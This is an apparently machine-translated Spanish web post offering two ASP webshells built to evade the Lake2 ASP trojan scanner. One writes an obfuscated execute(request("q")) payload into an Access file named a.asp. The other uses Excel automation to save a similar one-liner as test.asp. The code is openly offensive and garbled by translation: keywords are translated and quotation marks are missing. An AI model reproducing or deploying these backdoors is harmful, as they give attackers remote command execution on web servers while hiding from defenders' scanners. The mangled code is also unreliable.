Hanxiaolian escribió dos troyanos ASP no convencionales para evitar el asistente de administración de webmasters de Lake2 ASP
Escrito para evitar el asistente de administración de webmasters de Lake2 ASP...
1. Un pony que pasa por alto el escaneo del troyano Asp de lake2
Copie el código de código de la siguiente manera:
<%
establecer c = CrearObjeto(ADOX.Catalog)
c.create(Provider=Microsoft.Jet.OLEDB.4.0;Fuente de datos=&Server.MapPath(a.asp))
establecer c = nada
c&Servidor.MapPath(a.asp)
establecer conexión = servidor.createobject (Adodb.Connection)
conn.open connstr
conn.execute(crear tabla nomm(nomuma oleobject))
establecer rs=servidor.createobject(adodb.recordset)
sql=SELECCIONAR * DESDE nomm
rs.open sql, conexión, 1,3
rs.añadirnuevo
rs (nomuma).appendchunk(chrB(asc(<))&chrB(asc(%))&chrB(asc (e))&chrB
(asc(x))&chrB(asc(e))&chrB(asc(c))&chrB(asc (u))&chrB(asc(t))&chrB(asc
(e))&chrB(asc(+))&chrB(asc (r))&chrB(asc(e))&chrB(asc(q))&chrB(asc
(u))&chrB(asc (e))&chrB(asc(s))&chrB(asc(t))&chrB(asc(())&chrB(34)
&chrB(asc(q))&chrB(34)&chrB(asc()))&chrB(asc(%))& chrB(asc(>)))
rs.actualización
rs.cerrar
establecer rs = nada
con.cerrar
establecer conexión = nada
%>
2.xls versión asp webshell
Copie el código de código de la siguiente manera:
<%
Establecer xlA = Servidor.CrearObjeto(Excel.Aplicación)
xlA.Visible = Falso
xlA.Libros.Agregar
Establecer xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = <%ex&ec&ute(solicitud(q))+chr(37)+>
'strFile = d:/test.asp
strFile = Servidor.MapPath(prueba.asp)
xlWorkSheet.Guardar como archivo str
xlA.Salir
Establecer xlWorksheet = Nada
Establecer xlA = Nada
%>